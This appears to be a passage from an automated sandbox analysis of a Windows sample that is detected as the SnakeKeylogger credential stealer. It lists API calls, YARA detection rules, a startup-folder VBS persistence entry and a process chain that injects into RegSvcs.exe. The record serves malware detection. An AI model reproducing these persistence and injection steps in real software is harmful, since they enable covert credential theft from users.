                Source: toggeries.exe.0.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00938310: _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_009451BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B451BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585F3383_2_0585F338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585D3483_2_0585D348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05858B483_2_05858B48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B3483_2_0585B348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B3583_2_0585B358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058572B83_2_058572B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058572C83_2_058572C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058522F13_2_058522F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EA073_2_0585EA07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CA173_2_0585CA17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856A183_2_05856A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EA183_2_0585EA18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856A1A3_2_05856A1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CA283_2_0585CA28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851A403_2_05851A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851A503_2_05851A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854A683_2_05854A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854A783_2_05854A78
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40BA07_2_00C40BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089A0888_2_0089A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C1478_2_0089C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089D2788_2_0089D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008953628_2_00895362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C4688_2_0089C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C7388_2_0089C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089E9888_2_0089E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008969A08_2_008969A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008939F08_2_008939F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CA088_2_0089CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CCD88_2_0089CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CFAA8_2_0089CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00896FC88_2_00896FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089F6308_2_0089F630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008929EC8_2_008929EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089E97A8_2_0089E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089FA888_2_0089FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00893E098_2_00893E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD29688_2_05FD2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD95488_2_05FD9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD50288_2_05FD5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD9C188_2_05FD9C18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD17A08_2_05FD17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD0B308_2_05FD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD1E808_2_05FD1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE2588_2_05FDE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDDDFF8_2_05FDDDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD9A88_2_05FDD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD9998_2_05FDD999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD295A8_2_05FD295A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD5508_2_05FDD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD5408_2_05FDD540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD0F88_2_05FDD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDCCA08_2_05FDCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDCC8F8_2_05FDCC8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDFC688_2_05FDFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDFC588_2_05FDFC58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD00408_2_05FD0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD50188_2_05FD5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF8108_2_05FDF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD00068_2_05FD0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF8018_2_05FDF801
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF3B88_2_05FDF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF3A88_2_05FDF3A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD8BA08_2_05FD8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD178F8_2_05FD178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEF608_2_05FDEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEF518_2_05FDEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD0B208_2_05FD0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEB088_2_05FDEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEAF88_2_05FDEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE6B08_2_05FDE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE6AF8_2_05FDE6AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD1E708_2_05FD1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE2498_2_05FDE249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDDE008_2_05FDDE00
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: String function: 008E7DE1 appears 35 times
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: String function: 00908900 appears 42 times
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: String function: 00900AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Code function: String function: 00B08900 appears 42 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Code function: String function: 00B00AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Code function: String function: 00AE7DE1 appears 36 times
                Source: 6cicUo3f8g.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@5/3
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_0094A06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_009381CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_009387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Code function: 2_2_00B381CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Code function: 2_2_00B387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_0094B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_0095EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_0094C397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Code function: 0_2_008E4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe File created: C:\Users\user\AppData\Local\Thebesian
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe File created: C:\Users\user\AppData\Local\Temp\aut6785.tmp
                Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
                Source: 6cicUo3f8g.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002FCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002806000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027D4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 6cicUo3f8g.exe ReversingLabs: Detection: 82%
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe File read: C:\Users\user\Desktop\6cicUo3f8g.exe
                Source: unknown Process created: C:\Users\user\Desktop\6cicUo3f8g.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Process created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: kernel.appcore.dll
